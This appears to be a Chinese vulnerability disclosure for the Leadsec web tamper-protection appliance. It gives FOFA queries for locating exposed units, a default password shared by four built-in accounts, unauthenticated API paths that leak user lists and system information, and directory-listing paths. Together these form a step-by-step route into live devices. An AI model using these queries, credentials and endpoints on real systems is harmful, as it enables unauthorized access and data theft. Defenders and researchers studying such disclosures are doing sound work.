网御星云-网页防篡改系统多个漏洞

漏洞描述

网御星云网页防篡改系统，没啥好介绍的都懂，就是网页被篡改后能自动恢复的设备，存在弱口令，未授权信息泄露，遍历等漏洞。

漏洞影响

网御星云网页防篡改系统

FOFA

title = "网御web应用安全防护系统v3.0"

title = "网页防篡改系统"

漏洞复现

弱口令：

super(超级管理员)

admin(系统管理员)

operator(操作员)

viewer(审查员)

密码都是：Admin%100

未授权信息泄露：

报错界面暴露接口地址

URL+/API/

账号信息泄露

URL+/API/user/list

系统信息泄露

URL+/API/system_info/list

还可以进行目录遍历：

URL+/doc/
URL+/images/
URL+/audio/
URL+/fonts/